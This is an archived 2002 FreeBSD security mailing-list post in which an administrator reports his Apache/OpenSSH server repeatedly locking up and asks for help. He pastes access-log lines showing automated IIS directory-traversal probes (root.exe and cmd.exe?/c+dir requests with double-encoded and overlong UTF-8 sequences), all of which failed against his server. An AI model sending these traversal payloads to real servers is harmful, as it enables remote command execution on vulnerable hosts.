Date: Sat, 26 Jan 2002 09:13:12 -0800 From: "William J. Borskey" <wborskey@hotmail.com> To: freebsd-security@freebsd.org Subject: weird server activity Message-ID: <F31rfFz82buW5RNB6Hf00001c34@hotmail.com>
next in thread | raw e-mail | index | archive | help
I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my system went down and I wasnt able to log in or look at any web pages. I could connect, but it woud not spawn a process to log me in, or serve me a web document. I got someone to reboot the machine from the console, I was then able to log into the machine. Starting processes was slow but top reports normal system loads. Then after about an hour the machine would no longer run any processes and quickly shut me out by killing the sshd i was connected with. I did get a chance to look at some of my logs, not all unfortuantly. The httpd-access file had some weird sequences of windows sounding paths, but it wasnt code red or anything like code red: 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET "-" 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" i havnt been able to look at any other logs and i doubt that that has anything to do with it. William Borskey _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?F31rfFz82buW5RNB6Hf00001c34>